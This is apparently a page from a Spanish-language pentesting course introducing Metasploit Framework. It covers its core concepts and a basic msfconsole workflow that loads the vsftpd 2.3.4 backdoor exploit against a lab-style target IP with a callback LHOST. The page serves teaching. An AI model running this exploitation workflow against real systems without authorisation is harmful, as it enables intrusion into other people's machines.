Saltar al contenido
cd ..
RUTA PROPENTEST

Metasploit

RUTA PRO · MUY PRONTO

El tramo inicial del mapa es gratis y siempre lo será.

Metasploit Framework es la plataforma de explotación más usada en pentesting. Reúne cientos de exploits, payloads y herramientas auxiliares bajo una misma consola (msfconsole), con una forma de uso común para todos los módulos.

Su valor es la estandarización: en lugar de adaptar cada exploit a mano, se seleccionan módulos ya integrados, se configuran unas pocas opciones y se lanzan.

Conceptos clave

  • Exploit → módulo que aprovecha una vulnerabilidad específica.
  • Payload → código que se ejecuta en la víctima tras la explotación (ej. abrir una shell).
  • Meterpreter → payload avanzado que da una sesión con muchas funciones (subir/bajar archivos, capturar pantalla, escalar, pivotar).
  • Opciones → parámetros a configurar, como RHOSTS (objetivo) y LHOST (tu IP).
  • Auxiliary → módulos que no explotan, sino que escanean, enumeran o hacen fuzzing.

Flujo de trabajo básico

msfconsole               # abrir la consola

search vsftpd            # buscar un módulo
use exploit/unix/ftp/vsftpd_234_backdoor   # seleccionarlo
show options             # ver qué hay que configurar
set RHOSTS 10.10.10.10   # configurar el objetivo
set LHOST 10.10.14.5     # configurar tu IP (para el payload)
exploit                  # lanzar (o 'run')

El ciclo search → use → show options → set → exploit se repite para casi cualquier módulo.


ComponentePara qué sirve
exploit/Aprovechar una vulnerabilidad
payload/Qué se ejecuta tras entrar
auxiliary/Escanear, enumerar, fuzzear
post/Acciones de post-explotación

Metasploit resuelve mucho, pero no toda intrusión empieza con un exploit: muchas veces la puerta es una credencial débil. Romper contraseñas con fuerza bruta y diccionarios es el próximo tema (Hydra y Hashcat).

TU PROGRESO

¿Ya estudiaste este tema?

Marcá el tema como hecho para ganar su medalla y avanzar en el mapa.

MATRIZ DEL TEMA

Hacia qué pilares apunta este nodo (referencial).

FUNDREDESOSCRIPTOWEBPENTESTWEBHACKREDTEAMDEFENSADFIRGRCCLOUDOSINT